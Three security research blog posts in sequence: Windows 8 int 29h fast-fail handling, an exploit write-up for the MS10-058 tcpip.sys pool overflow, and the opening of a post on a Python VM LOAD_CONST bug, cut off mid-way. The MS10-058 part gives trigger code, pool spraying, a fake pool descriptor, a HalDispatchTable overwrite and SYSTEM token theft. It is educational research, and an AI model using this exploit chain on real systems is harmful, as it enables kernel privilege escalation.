The untold story: Win8 and nt!KiFastFailDispatch

Introduction

When I was writing this little post I also did some tests on my personal machine: a Windows 8 host. But the test for the /GS thing we just talked about wasn't working at all, as I said. So I started my investigation by looking at the code of __report_gsfailure (generated with VS2012) and I saw this:

void __usercall __report_gsfailure(unsigned int a1<ebx>, unsigned int a2<edi>, unsigned int a3<esi>, char a4)
{
    unsigned int v4; // eax@1
    unsigned int v5; // edx@1
    unsigned int v6; // ecx@1
    unsigned int v11; // [sp-4h] [bp-328h]@1
    unsigned int v12; // [sp+324h] [bp+0h]@0
    void *v13; // [sp+328h] [bp+4h]@3

    v4 = IsProcessorFeaturePresent(0x17u);
    // [...]
    if ( v4 )
    {
        v6 = 2;
        __asm { int     29h             ; DOS 2+ internal - FAST PUTCHAR }
    }
    // [...]
    __raise_securityfailure(&GS_ExceptionPointers);
}

The first thing I asked myself was about that weird int 29h. The next thing I did was to download a fresh Windows 8 VM here and attach a kernel debugger in order to check the IDT entry 0x29:

kd> vertarget
Windows 8 Kernel Version 9200 MP (2 procs) Free x86 compatible
Built by: 9200.16424.x86fre.win8_gdr.120926-1855
Machine Name:
Kernel base = 0x8145c000 PsLoadedModuleList = 0x81647e68
Debug session time: Thu Oct 17 11:30:18.772 2013 (UTC + 2:00)
System Uptime: 0 days 0:02:55.784

kd> !idt 29

Dumping IDT: 809da400

29: 8158795c nt!KiRaiseSecurityCheckFailure

As opposed to what I was used to seeing on my Win7 machine:

kd> vertarget
Windows 7 Kernel Version 7600 MP (1 procs) Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 7600.16385.x86fre.win7_rtm.090713-1255
Machine Name:
Kernel base = 0x84646000 PsLoadedModuleList = 0x8478e810
Debug session time: Thu Oct 17 14:25:40.969 2013 (UTC + 2:00)
System Uptime: 0 days 0:00:55.203

kd> !idt 29

Dumping IDT: 80b95400

29: 00000000

I've opened my favorite IDE and I wrote a bit of code to test if there was a different behavior between Win7 and Win8 regarding this exception handling:

#include <stdio.h>
#include <windows.h>

int main()
{
    __try
    {
        __asm int 0x29
    }
    __except(EXCEPTION_EXECUTE_HANDLER)
    {
        printf("SEH catched the exception!\n");
    }
    return 0;
}

On Win7 I'm able to catch the exception via a SEH handler: it means the Windows kernel calls the user mode exception dispatcher for further processing by the user exception handlers (as we saw at the beginning of the post). But on Win8, to my surprise, I don't get the message; the process is killed directly after displaying the usual message box "a program has stopped". Definitely weird.

What happens on Win7

When the interrupt 0x29 is triggered by my code, the CPU is going to check if there is an IDT entry for that interrupt, and if there isn't it's going to raise a #GP (nt!KiTrap0D) that will end up in nt!KiDispatchException.

As previously, the function is going to check where the fault happened, and because it happened in userland it will modify the trap frame structure to reach ntdll!KiUserExceptionDispatcher. That's why we can catch it in our __except scope.

kd> r
eax=0000000d ebx=86236d40 ecx=862b48f0 edx=0050e600 esi=00000000 edi=0029b39f
eip=848652dd esp=9637fd34 ebp=9637fd34 iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000246
nt!KiTrap0D+0x471:
848652dd e80ddeffff      call    nt!CommonDispatchException+0x123 (848630ef)

kd> k 2
ChildEBP RetAddr  
9637fd34 0029b39f nt!KiTrap0D+0x471
0016fc1c 0029be4c gs+0x2b39f

kd> u gs+0x2b39f l1
gs+0x2b39f:
0029b39f cd29            int     29h

What happens on Win8

This time the kernel has defined an ISR for the interrupt 0x29: nt!KiRaiseSecurityCheckFailure. This function is going to call nt!KiFastFailDispatch, and this one is going to call nt!KiDispatchException:

kifastfaildispatch.png

BUT the exception is going to be processed as a second-chance exception because of the way nt!KiFastFailDispatch calls the kernel mode exception dispatcher. And if we look at the source of nt!KiDispatchException in ReactOS we can see that this exception won't have the chance to reach back to userland as in Win7 :)):

VOID
NTAPI
KiDispatchException(IN PEXCEPTION_RECORD ExceptionRecord,
                    IN PKEXCEPTION_FRAME ExceptionFrame,
                    IN PKTRAP_FRAME TrapFrame,
                    IN KPROCESSOR_MODE PreviousMode,
                    IN BOOLEAN FirstChance)
{
    CONTEXT Context;
    EXCEPTION_RECORD LocalExceptRecord;

// [...]
    /* Handle kernel-mode first, it's simpler */
    if (PreviousMode == KernelMode)
    {
// [...]
    }
    else
    {
        /* User mode exception, was it first-chance? */
        if (FirstChance)
        {
// [...]
// it's in this branch that the kernel reaches back to the user mode exception dispatcher
// but if FirstChance=0, we won't have that chance

            /* Set EIP to the User-mode Dispatcher */
            TrapFrame->Eip = (ULONG)KeUserExceptionDispatcher;

            /* Dispatch exception to user-mode */
            _SEH2_YIELD(return);
        }

        /* Try second chance */
        if (DbgkForwardException(ExceptionRecord, TRUE, TRUE))
        {
            /* Handled, get out */
            return;
        }
        else if (DbgkForwardException(ExceptionRecord, FALSE, TRUE))
        {
            /* Handled, get out */
            return;
        }
// [...]
    return;
}

To convince yourself you can even modify the FirstChance argument passed to nt!KiDispatchException from nt!KiFastFailDispatch. You will see the SEH handler is called like in Win7:

win8.png

Cool, we now have our answer to the weird behavior! I guess if you want to monitor /GS exceptions you are going to have to find another trick :)).
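
The routing decision discussed in this part can be summed up with a tiny Python model. It is a deliberately simplified sketch of the ReactOS excerpt above (the debugger forwarding and the elided branches are collapsed into one outcome), and the function and string names are invented for the illustration.

```python
def dispatch_target(previous_mode, first_chance):
    """Very rough model of where nt!KiDispatchException sends an exception."""
    if previous_mode == 'kernel':
        return 'kernel-mode handling'
    if first_chance:
        # TrapFrame->Eip is redirected to the user mode dispatcher.
        return 'ntdll!KiUserExceptionDispatcher'
    # Second chance: user-mode SEH handlers never get to see the exception.
    return 'second-chance handling'

if __name__ == '__main__':
    # Win7: int 29h ends up as a #GP dispatched as a first-chance exception.
    print(dispatch_target('user', first_chance=True))
    # Win8: nt!KiFastFailDispatch dispatches it as a second-chance exception.
    print(dispatch_target('user', first_chance=False))
```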

Conclusion

I hope you enjoyed this little trip in the Windows' exception world both in user and kernel mode. You will find the seems-to-be-working PoC on my github account here: The sentinel. By the way, you are highly encouraged to improve it, or to modify it in order to suit your use-case!

If you liked the subject of the post, I've made a list of really cool/interesting links you should check out:

High five to my friend @Ivanlef0u for helping me to troubleshoot the weird behavior, and @__x86 for the review!

First dip into the kernel pool : MS10-058

Introduction

I am currently playing with pool-based memory corruption vulnerabilities. That’s why I wanted to program a PoC exploit for the vulnerability presented by Tarjei Mandt during his first talk “Kernel Pool Exploitation on Windows 7” [3]. I think it's a good exercise to start learning about pool overflows.

Forewords

If you want to experiment with this vulnerability, you should read [1] and be sure to have a vulnerable system. I tested my exploit on a VM with Windows 7 32 bits with tcpip.sys 6.1.7600.16385. The Microsoft bulletin dealing with this vulnerability is MS10-058. It was found by Matthieu Suiche [2] and was used as an example in Tarjei Mandt’s paper [3].

Triggering the flaw

An integer overflow in tcpip!IppSortDestinationAddresses makes it possible to allocate a wrong-sized non-paged pool memory chunk. Below you can see the diff between the vulnerable version and the patched version.

diff.png

So basically the flaw is merely an integer overflow that triggers a pool overflow.

IppSortDestinationAddresses(x,x,x)+29   imul    eax, 1Ch
IppSortDestinationAddresses(x,x,x)+2C   push    esi
IppSortDestinationAddresses(x,x,x)+2D   mov     esi, ds:__imp__ExAllocatePoolWithTag@12 
IppSortDestinationAddresses(x,x,x)+33   push    edi
IppSortDestinationAddresses(x,x,x)+34   mov     edi, 73617049h
IppSortDestinationAddresses(x,x,x)+39   push    edi   
IppSortDestinationAddresses(x,x,x)+3A   push    eax  
IppSortDestinationAddresses(x,x,x)+3B   push    ebx           
IppSortDestinationAddresses(x,x,x)+3C   call    esi ; ExAllocatePoolWithTag(x,x,x)

You can reach this code by calling WSAIoctl with the control code SIO_ADDRESS_LIST_SORT, like this:

WSAIoctl(sock, SIO_ADDRESS_LIST_SORT, pwn, 0x1000, pwn, 0x1000, &cb, NULL, NULL)

You have to pass the function a pointer to a SOCKET_ADDRESS_LIST (pwn in the example). This SOCKET_ADDRESS_LIST contains an iAddressCount field followed by iAddressCount SOCKET_ADDRESS structures. With a high iAddressCount value, the multiplication will wrap, thus triggering the wrong-sized allocation. We can write almost anything in those structures. There are only two limitations:

IppFlattenAddressList(x,x)+25   lea     ecx, [ecx+ebx*8]
IppFlattenAddressList(x,x)+28   cmp     dword ptr [ecx+8], 1Ch
IppFlattenAddressList(x,x)+2C   jz      short loc_4DCA9

IppFlattenAddressList(x,x)+9C   cmp     word ptr [edx], 17h
IppFlattenAddressList(x,x)+A0   jnz     short loc_4DCA2

The copy stops if either of those checks fails. That means that each SOCKET_ADDRESS must have a length of 0x1c and that each SOCKADDR buffer pointed to by the socket address must begin with the 16-bit value 0x17 (AF_INET6). Long story short:

  • Make the multiplication at IppSortDestinationAddresses+29 overflow
  • Get a non-paged pool chunk at IppSortDestinationAddresses+3e that is too small
  • Write user controlled memory to this chunk in IppFlattenAddressList+67 and overflow as much as you want (provided that you take care of the 0x1c and 0x17 bytes)
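The first step of the list above can be checked with a quick calculation. This is only a sketch in Python 3 that models the 32-bit `imul eax, 1Ch` instruction; the helper name `requested_size` is made up for the illustration, and the count value is the one used in the trigger code of this article.

```python
MASK32 = 0xFFFFFFFF  # the multiplication happens in a 32-bit register (eax)

def requested_size(address_count, entry_size=0x1C):
    """Model `imul eax, 1Ch`: the product is truncated to 32 bits."""
    return (address_count * entry_size) & MASK32

count = 0x40000003                  # iAddressCount used in the trigger code
print(hex(count * 0x1C))            # 0x700000054, the size that is really needed
print(hex(requested_size(count)))   # 0x54, the size that is actually requested
```

The driver therefore asks for room for only three entries while the copy loop is driven by the much larger count.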

The code below should trigger a BSOD. Now the objective is to place an object after our vulnerable object and modify pool metadata.

WSADATA wd = {0};
SOCKET sock = 0;
SOCKET_ADDRESS_LIST *pwn = (SOCKET_ADDRESS_LIST*)malloc(sizeof(INT) + 4 * sizeof(SOCKET_ADDRESS));
SOCKET_ADDRESS sa = {0};
char buffer[0x1c];
DWORD cb;

/* Each SOCKADDR buffer must begin with 0x17 and be 0x1c bytes long */
memset(buffer,0x41,0x1c);
buffer[0] = 0x17;
buffer[1] = 0x00;
sa.lpSockaddr = (LPSOCKADDR)buffer;
sa.iSockaddrLength = 0x1c;
/* 0x40000003 * 0x1c wraps to 0x54 on 32 bits */
pwn->iAddressCount = 0x40000003;
memcpy(&pwn->Address[0],&sa,sizeof(SOCKET_ADDRESS));
memcpy(&pwn->Address[1],&sa,sizeof(SOCKET_ADDRESS));
memcpy(&pwn->Address[2],&sa,sizeof(SOCKET_ADDRESS));
memcpy(&pwn->Address[3],&sa,sizeof(SOCKET_ADDRESS));

WSAStartup(MAKEWORD(2,0), &wd);
sock = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
WSAIoctl(sock, SIO_ADDRESS_LIST_SORT, pwn, 0x1000, pwn, 0x1000, &cb, NULL, NULL);

Spraying the pool

Non paged objects

There are several objects that we could easily use to manipulate the non-paged pool. For instance we could use semaphore objects or reserve objects.

*8516b848 size:   48 previous size:   48  (Allocated) Sema 
*85242d08 size:   68 previous size:   68  (Allocated) User 
*850fcea8 size:   60 previous size:    8  (Allocated) IoCo

We are trying to overflow a pool chunk whose size is a multiple of 0x1c. As 0x1c*3=0x54, the driver is going to request 0x54 bytes and will therefore be given a chunk of 0x60 bytes. This is exactly the size of an I/O completion reserve object. To allocate an IoCo, we just need to call NtAllocateReserveObject with the object type IOCO. To deallocate the IoCo, we can simply close the associated handle, which makes the object manager release the object. For more in-depth information about reserve objects, you can read j00ru’s article [4].
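The jump from 0x54 requested bytes to a 0x60-byte chunk can be reproduced with a small sketch. It assumes an 8-byte pool header (the size of the _POOL_HEADER shown later in this article) and an 8-byte block granularity on 32-bit Windows 7; the function name `chunk_size` is hypothetical.

```python
POOL_HEADER_SIZE = 8   # assumed: sizeof(_POOL_HEADER) on 32-bit Windows 7
POOL_GRANULARITY = 8   # assumed: pool blocks are multiples of 8 bytes on x86

def chunk_size(requested):
    """Add the header, then round up to the next multiple of the granularity."""
    total = requested + POOL_HEADER_SIZE
    return (total + POOL_GRANULARITY - 1) & ~(POOL_GRANULARITY - 1)

print(hex(chunk_size(0x54)))  # 0x60
```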

In order to spray, we first allocate a lot of IoCo objects without releasing them, so as to fill the existing holes in the pool. After that, we allocate more IoCo objects and release some of them to make holes of 0x60 bytes. This is illustrated in the sprayIoCo() function of my PoC. Now we are able to have an IoCo pool chunk following an Ipas pool chunk (as you might have noticed, ‘Ipas’ is the tag used by the tcpip driver). Therefore, we can easily corrupt its pool header.

nt!PoolHitTag

If you want to debug a specific call to ExFreePoolWithTag and simply break on it, you’ll see that there are way too many frees (and above all, this is very slow when kernel debugging). A simple way to get around this issue is to use pool hit tags.

ExFreePoolWithTag(x,x)+62F                  and     ecx, 7FFFFFFFh
ExFreePoolWithTag(x,x)+635                  mov     eax, ebx
ExFreePoolWithTag(x,x)+637                  mov     ebx, ecx
ExFreePoolWithTag(x,x)+639                  shl     eax, 3
ExFreePoolWithTag(x,x)+63C                  mov     [esp+58h+var_28], eax
ExFreePoolWithTag(x,x)+640                  mov     [esp+58h+var_2C], ebx
ExFreePoolWithTag(x,x)+644                  cmp     ebx, _PoolHitTag
ExFreePoolWithTag(x,x)+64A                  jnz     short loc_5180E9
ExFreePoolWithTag(x,x)+64C                  int     3               ; Trap to Debugger

As you can see in the listing above, nt!PoolHitTag is compared against the pool tag of the chunk being freed. Notice the mask: it lets you use the raw tag (for instance ‘oooo’ instead of 0xef6f6f6f). By the way, you are not required to use the genuine tag (e.g. you can use ‘ooo’ for ‘IoCo’). Now you know that you can run ed nt!PoolHitTag ‘oooo’ to debug your exploit.
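To make the mask concrete, here is a small Python 3 sketch of the comparison. The two helper names are invented for the example; only the 0x7FFFFFFF mask and the tag values come from the listing and the text above.

```python
import struct

def tag_to_dword(tag):
    """Pack a four-character pool tag the way it sits in memory (little-endian)."""
    return struct.unpack('<I', tag.encode('ascii'))[0]

def matches_hit_tag(header_tag, hit_tag):
    """Model the check: the top bit of the tag is masked off before the compare."""
    return (header_tag & 0x7FFFFFFF) == hit_tag

print(hex(tag_to_dword('oooo')))                          # 0x6f6f6f6f
print(hex(tag_to_dword('IoCo')))                          # 0x6f436f49
print(matches_hit_tag(0xEF6F6F6F, tag_to_dword('oooo')))  # True
```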

Exploitation technique

Basic structure

As the internals of the pool are thoroughly detailed in Tarjei Mandt’s paper [3], I will only give a glimpse of the pool descriptor and the pool header structures. The pool memory is divided into several types of pool. Two of them are the paged pool and the non-paged pool. A pool is described by a _POOL_DESCRIPTOR structure as seen below.

0: kd> dt _POOL_TYPE
ntdll!_POOL_TYPE
   NonPagedPool = 0n0
   PagedPool = 0n1
0: kd> dt _POOL_DESCRIPTOR
nt!_POOL_DESCRIPTOR
   +0x000 PoolType         : _POOL_TYPE
   +0x004 PagedLock        : _KGUARDED_MUTEX
   +0x004 NonPagedLock     : Uint4B
   +0x040 RunningAllocs    : Int4B
   +0x044 RunningDeAllocs  : Int4B
   +0x048 TotalBigPages    : Int4B
   +0x04c ThreadsProcessingDeferrals : Int4B
   +0x050 TotalBytes       : Uint4B
   +0x080 PoolIndex        : Uint4B
   +0x0c0 TotalPages       : Int4B
   +0x100 PendingFrees     : Ptr32 Ptr32 Void
   +0x104 PendingFreeDepth : Int4B
   +0x140 ListHeads        : [512] _LIST_ENTRY

A pool descriptor references free memory in a free list called ListHeads. The PendingFrees field references chunks of memory waiting to be freed to the free list. Pointers to pool descriptor structures are stored in arrays such as PoolVector (non-paged) or ExpPagedPoolDescriptor (paged). Each chunk of memory contains a header before the actual data. This is the _POOL_HEADER. It carries information such as the size of the block or the pool it belongs to.

0: kd> dt _POOL_HEADER
nt!_POOL_HEADER
   +0x000 PreviousSize     : Pos 0, 9 Bits
   +0x000 PoolIndex        : Pos 9, 7 Bits
   +0x002 BlockSize        : Pos 0, 9 Bits
   +0x002 PoolType         : Pos 9, 7 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 PoolTag          : Uint4B
   +0x004 AllocatorBackTraceIndex : Uint2B
   +0x006 PoolTagHash      : Uint2B
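The bit fields are easier to read once decoded. The sketch below (Python 3, function name made up) splits the first dword of a header according to the layout printed above. As a sample it uses 0x060c0a00, the header value that the fake chunk at address 0x1200 receives later in this article.

```python
def decode_pool_header(ulong1):
    """Split the first dword of a 32-bit _POOL_HEADER into its bit fields."""
    low = ulong1 & 0xFFFF            # word at +0x000
    high = (ulong1 >> 16) & 0xFFFF   # word at +0x002
    return {
        'PreviousSize': low & 0x1FF,   # Pos 0, 9 bits
        'PoolIndex': low >> 9,         # Pos 9, 7 bits
        'BlockSize': high & 0x1FF,     # Pos 0, 9 bits
        'PoolType': high >> 9,         # Pos 9, 7 bits
    }

hdr = decode_pool_header(0x060C0A00)
print(hdr)                        # PreviousSize 0, PoolIndex 5, BlockSize 12, PoolType 3
print(hex(hdr['BlockSize'] * 8))  # 0x60, assuming sizes are counted in 8-byte units
```

With this value the chunk claims to be 0x60 bytes long and to belong to pool index 5.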

PoolIndex overwrite

The basic idea of this attack is to corrupt the PoolIndex field of a pool header. This field is used when deallocating paged pool chunks in order to know which pool descriptor it belongs to. It is used as an index in an array of pointers to pool descriptors. Thus, if an attacker is able to corrupt it, he can make the pool manager believe that a specific chunk belongs to another pool descriptor. For instance, one could reference a pool descriptor out of the bounds of the array.

0: kd> dd ExpPagedPoolDescriptor
82947ae0  84835000 84836140 84837280 848383c0
82947af0  84839500 00000000 00000000 00000000

As there are always some null pointers after the array, it could be used to craft a fake pool descriptor in a user-allocated null page.
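A toy model of the lookup shows why an out-of-bounds index is enough. The list below simply copies the eight dwords from the dump above (five descriptor pointers followed by zeros); the function name is hypothetical and no bounds check is modelled, just as the text describes.

```python
# The eight dwords dumped at ExpPagedPoolDescriptor in the listing above
EXP_PAGED_POOL_DESCRIPTOR = [
    0x84835000, 0x84836140, 0x84837280, 0x848383C0,
    0x84839500, 0x00000000, 0x00000000, 0x00000000,
]

def descriptor_for(pool_index):
    """Return the descriptor pointer selected by a (possibly corrupted) PoolIndex."""
    return EXP_PAGED_POOL_DESCRIPTOR[pool_index]

print(hex(descriptor_for(4)))  # 0x84839500, the last genuine descriptor
print(hex(descriptor_for(5)))  # 0x0, the "descriptor" now lives in the null page
```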

Non paged pool type

To determine which _POOL_DESCRIPTOR to use, ExFreePoolWithTag gets the appropriate _POOL_HEADER and stores PoolType (watchMe) and BlockSize (var_3C):

ExFreePoolWithTag(x,x)+465
ExFreePoolWithTag(x,x)+465  loc_517F01:
ExFreePoolWithTag(x,x)+465  mov     edi, esi
ExFreePoolWithTag(x,x)+467  movzx   ecx, word ptr [edi-6]
ExFreePoolWithTag(x,x)+46B  add     edi, 0FFFFFFF8h
ExFreePoolWithTag(x,x)+46E  movzx   eax, cx
ExFreePoolWithTag(x,x)+471  mov     ebx, eax
ExFreePoolWithTag(x,x)+473  shr     eax, 9
ExFreePoolWithTag(x,x)+476  mov     esi, 1FFh
ExFreePoolWithTag(x,x)+47B  and     ebx, esi
ExFreePoolWithTag(x,x)+47D  mov     [esp+58h+var_40], eax
ExFreePoolWithTag(x,x)+481  and     eax, 1
ExFreePoolWithTag(x,x)+484  mov     edx, 400h
ExFreePoolWithTag(x,x)+489  mov     [esp+58h+var_3C], ebx
ExFreePoolWithTag(x,x)+48D  mov     [esp+58h+watchMe], eax
ExFreePoolWithTag(x,x)+491  test    edx, ecx
ExFreePoolWithTag(x,x)+493  jnz     short loc_517F49

Later, if ExpNumberOfNonPagedPools equals 1, the correct pool descriptor will directly be taken from nt!PoolVector[0]. The PoolIndex is not used.

ExFreePoolWithTag(x,x)+5C8  loc_518064:
ExFreePoolWithTag(x,x)+5C8  mov     eax, [esp+58h+watchMe]
ExFreePoolWithTag(x,x)+5CC  mov     edx, _PoolVector[eax*4]
ExFreePoolWithTag(x,x)+5D3  mov     [esp+58h+var_48], edx
ExFreePoolWithTag(x,x)+5D7  mov     edx, [esp+58h+var_40]
ExFreePoolWithTag(x,x)+5DB  and     edx, 20h
ExFreePoolWithTag(x,x)+5DE  mov     [esp+58h+var_20], edx
ExFreePoolWithTag(x,x)+5E2  jz      short loc_5180B6


ExFreePoolWithTag(x,x)+5E8  loc_518084:
ExFreePoolWithTag(x,x)+5E8  cmp     _ExpNumberOfNonPagedPools, 1
ExFreePoolWithTag(x,x)+5EF  jbe     short loc_5180CB

ExFreePoolWithTag(x,x)+5F1  movzx   eax, word ptr [edi]
ExFreePoolWithTag(x,x)+5F4  shr     eax, 9
ExFreePoolWithTag(x,x)+5F7  mov     eax, _ExpNonPagedPoolDescriptor[eax*4]
ExFreePoolWithTag(x,x)+5FE  jmp     short loc_5180C7

Therefore, you have to make the pool manager believe that the chunk is located in paged memory.

Crafting a fake pool descriptor

As we want a fake pool descriptor at the null address, we just allocate this page and place a fake deferred free list and a fake ListHeads in it.

When freeing a chunk, if the deferred freelist contains at least 0x20 entries, ExFreePoolWithTag is going to actually free those chunks and put them on the appropriate entries of the ListHeads.

*(PCHAR*)0x100 = (PCHAR)0x1208; 
*(PCHAR*)0x104 = (PCHAR)0x20;
for (i = 0x140; i < 0x1140; i += 8) {
    *(PCHAR*)i = (PCHAR)WriteAddress-4;
}
*(PINT)0x1200 = (INT)0x060c0a00;
*(PINT)0x1204 = (INT)0x6f6f6f6f;
*(PCHAR*)0x1208 = (PCHAR)0x0;
*(PINT)0x1260 = (INT)0x060c0a0c;
*(PINT)0x1264 = (INT)0x6f6f6f6f;
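To see how these writes line up with the _POOL_DESCRIPTOR layout, the same stores can be replayed on a plain buffer. This is a Python 3 sketch only: `page` stands in for the user-allocated null page, `put32` is a made-up helper, and WRITE_ADDRESS is a placeholder value rather than the address used by the PoC.

```python
import struct

WRITE_ADDRESS = 0x41414141   # placeholder; the PoC uses a real kernel address
page = bytearray(0x2000)     # stand-in for the user-allocated null page

def put32(offset, value):
    """Store a 32-bit little-endian value at the given offset of the fake page."""
    struct.pack_into('<I', page, offset, value & 0xFFFFFFFF)

put32(0x100, 0x1208)         # +0x100 PendingFrees: points into the fake chunk
put32(0x104, 0x20)           # +0x104 PendingFreeDepth: 0x20 entries
for off in range(0x140, 0x1140, 8):
    put32(off, WRITE_ADDRESS - 4)   # first dword (Flink) of each ListHeads entry
put32(0x1200, 0x060C0A00)    # header of the fake chunk
put32(0x1204, 0x6F6F6F6F)    # its tag, 'oooo'
put32(0x1208, 0x0)           # first dword of the chunk body
put32(0x1260, 0x060C0A0C)    # header of the chunk 0x60 bytes further
put32(0x1264, 0x6F6F6F6F)

entries = len(range(0x140, 0x1140, 8))
print(entries)  # 512, the number of ListHeads entries in the descriptor
```

The loop bounds cover exactly the 512 _LIST_ENTRY slots that start at offset 0x140.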

Notes

It is interesting to note that this attack would not work with modern mitigations. Here are a few reasons :

  • Validation of the PoolIndex field
  • Prevention of the null page allocation
  • NonPagedPoolNX has been introduced with Windows 8 and should be used instead of the NonPagedPool type.
  • SMAP would prevent access to userland data
  • SMEP would prevent execution of userland code

Payload and clean-up

A classical target for write-what-where scenarios is the HalDispatchTable. We just have to overwrite HalDispatchTable+4 with a pointer to our payload which is setupPayload(). When we are done, we just have to put back the pointer to hal!HaliQuerySystemInformation. (otherwise you can expect some crashes)

Now that we are able to execute arbitrary code from kernel land, we just have to get the _EPROCESS of the attacking process with PsGetCurrentProcess() and walk the list of processes using the ActiveProcessLinks field until we encounter a process with ImageFileName equal to “System”. Then we just replace the access token of the attacker process with that of the system process. Note that the lazy author of this exploit hardcoded several offsets :).

This is illustrated in payload().
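The list walk itself is simple, and a user-mode toy model may help to picture it. Everything in this Python 3 sketch is hypothetical: the `Process` class only mimics the three _EPROCESS fields named above, and the real payload works on kernel structures with hardcoded offsets.

```python
class Process:
    """Hypothetical stand-in for _EPROCESS with only the fields the text mentions."""
    def __init__(self, name, token):
        self.image_file_name = name
        self.token = token
        self.next = None  # models ActiveProcessLinks.Flink

def link(processes):
    """Chain the processes into a circular list."""
    for cur, nxt in zip(processes, processes[1:] + processes[:1]):
        cur.next = nxt

def steal_system_token(current):
    """Walk the list from `current` and copy the token of the 'System' process."""
    proc = current.next
    while proc is not current:
        if proc.image_file_name == 'System':
            current.token = proc.token
            return True
        proc = proc.next
    return False

procs = [Process('System', 'SYSTEM-token'),
         Process('explorer.exe', 'user-token'),
         Process('exploit.exe', 'user-token')]
link(procs)
attacker = procs[2]
steal_system_token(attacker)
print(attacker.token)  # SYSTEM-token
```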

screenshot.png

Greetings

Special thanks to my friend @0vercl0k for his review and help!

Conclusion

I hope you enjoyed this article. If you want to know more about the topic, check out the latest papers of Tarjei Mandt, Zhenhua Liu and Nikita Tarakanov. (or wait for other articles ;) )

You can find my code on my new github [5]. Don’t hesitate to share comments on my article or my exploit if you see something wrong :)

References

[1] Vulnerability details on itsecdb

[2] MS bulletin

[3] Kernel Pool Exploitation on Windows 7 - Tarjei Mandt's paper. A must-read!

[4] Reserve Objects in Windows 7 - Great j00ru's article!

[5] The code of my exploit for MS10-058

Deep dive into Python's VM: Story of LOAD_CONST bug

Introduction

A year ago, I wrote a Python script to leverage a bug in Python's virtual machine: the idea was to fully control the Python virtual processor and then to instrument the VM to execute native code. The python27_abuse_vm_to_execute_x86_code.py script wasn't really self-explanatory, so I believe only a few people actually took the time to understand what happened under the hood. The purpose of this post is to explain the bug, how you can control the VM and how you can turn the bug into something more useful. It's also a cool occasion to see how the Python virtual machine works from a low-level perspective: what we love so much, right?

But before going further, I just would like to clarify a couple of things:

  • I didn't find this bug: it is quite old and known to the Python developers (trading safety for performance), so don't panic, this is not a 0day or a new bug ; it can be a cool CTF trick though
  • Obviously, YES I know we can also "escape" the virtual machine with the ctypes module ; but this is a feature, not a bug. In addition, ctypes is always "removed" from sandbox implementations in Python

Also, keep in mind I will focus on Python 2.7.5 x86 on Windows ; obviously this is adaptable to other systems and architectures, which is left as an exercise for the interested reader. All right, let's move on to the first part: this one will focus on the essentials of the VM and Python objects.

The Python virtual processor

Introduction

As you know, Python is a (really cool) interpreted scripting language, and the source of the official interpreter is available here: Python-2.7.6.tgz. The project is written in C, and it is really readable ; so please download the sources and read them, you will learn a lot of things. Now all the Python code you write is compiled, at some point, into "bytecode": let's say it's exactly the same as when your C code is compiled into x86 code. But the cool thing for us is that the Python architecture is far simpler than x86.

Here is a partial list of all available opcodes in Python 2.7.5:

In [5]: len(opcode.opmap.keys())
Out[5]: 119
In [4]: opcode.opmap.keys()
Out[4]: [
  'CALL_FUNCTION',
  'DUP_TOP',
  'INPLACE_FLOOR_DIVIDE',
  'MAP_ADD',
  'BINARY_XOR',
  'END_FINALLY',
  'RETURN_VALUE',
  'POP_BLOCK',
  'SETUP_LOOP',
  'BUILD_SET',
  'POP_TOP',
  'EXTENDED_ARG',
  'SETUP_FINALLY',
  'INPLACE_TRUE_DIVIDE',
  'CALL_FUNCTION_KW',
  'INPLACE_AND',
  'SETUP_EXCEPT',
  'STORE_NAME',
  'IMPORT_NAME',
  'LOAD_GLOBAL',
  'LOAD_NAME',
  ...
]
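If you want to look up a single opcode rather than list them all, the opcode module gives you both directions of the mapping. This short sketch runs on Python 3 as well as 2.7 ; the numeric values and the number of opcodes differ between versions, so nothing here assumes the 2.7.5 numbers.

```python
import opcode

# Name -> number, then number -> name
load_const = opcode.opmap['LOAD_CONST']
print(load_const)
print(opcode.opname[load_const])   # LOAD_CONST

# The count depends on the interpreter version
print(len(opcode.opmap))
```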

The virtual machine

The Python VM is fully implemented in the function PyEval_EvalFrameEx that you can find in the ceval.c file. The machine is built with a simple loop handling opcodes one-by-one with a bunch of switch-cases:

PyObject *
PyEval_EvalFrameEx(PyFrameObject *f, int throwflag)
{
  //...
  fast_next_opcode:
  //...
  /* Extract opcode and argument */
  opcode = NEXTOP();
  oparg = 0;
  if (HAS_ARG(opcode))
    oparg = NEXTARG();
  //...
  switch (opcode)
  {
    case NOP:
      goto fast_next_opcode;

    case LOAD_FAST:
      x = GETLOCAL(oparg);
      if (x != NULL) {
        Py_INCREF(x);
        PUSH(x);
        goto fast_next_opcode;
      }
      format_exc_check_arg(PyExc_UnboundLocalError,
        UNBOUNDLOCAL_ERROR_MSG,
        PyTuple_GetItem(co->co_varnames, oparg));
      break;

    case LOAD_CONST:
      x = GETITEM(consts, oparg);
      Py_INCREF(x);
      PUSH(x);
      goto fast_next_opcode;

    case STORE_FAST:
      v = POP();
      SETLOCAL(oparg, v);
      goto fast_next_opcode;

    //...
  }

The machine also uses a virtual stack to pass objects to, and return them from, the different opcodes. So it really looks like an architecture we are used to dealing with, nothing exotic.
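To make the loop-plus-stack design tangible, here is a deliberately tiny model of it in Python 3. It is a sketch, not the real interpreter: it assumes the Python 2.7 encoding (one opcode byte, followed by a 16-bit little-endian argument for opcodes greater than or equal to 90) and the 2.7 opcode numbers, and it only knows four opcodes.

```python
HAVE_ARGUMENT = 90   # Python 2.7: opcodes >= 90 are followed by a 16-bit argument
LOAD_FAST, LOAD_CONST, BINARY_ADD, RETURN_VALUE = 124, 100, 23, 83  # 2.7 values

def run(code, consts=(), fastlocals=()):
    """Fetch, decode and execute opcodes one by one, using a list as the stack."""
    stack = []
    pc = 0
    while True:
        op = code[pc]
        pc += 1
        arg = 0
        if op >= HAVE_ARGUMENT:
            arg = code[pc] | (code[pc + 1] << 8)
            pc += 2
        if op == LOAD_FAST:
            stack.append(fastlocals[arg])
        elif op == LOAD_CONST:
            stack.append(consts[arg])   # this model checks bounds, unlike the C macro
        elif op == BINARY_ADD:
            w = stack.pop()
            v = stack.pop()
            stack.append(v + w)
        elif op == RETURN_VALUE:
            return stack.pop()
        else:
            raise ValueError('opcode %d is not modelled' % op)

code = bytes([LOAD_FAST, 0, 0, LOAD_FAST, 1, 0, BINARY_ADD, RETURN_VALUE])
print(run(code, fastlocals=('Hello', 'World')))  # HelloWorld
```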

Everything is an object

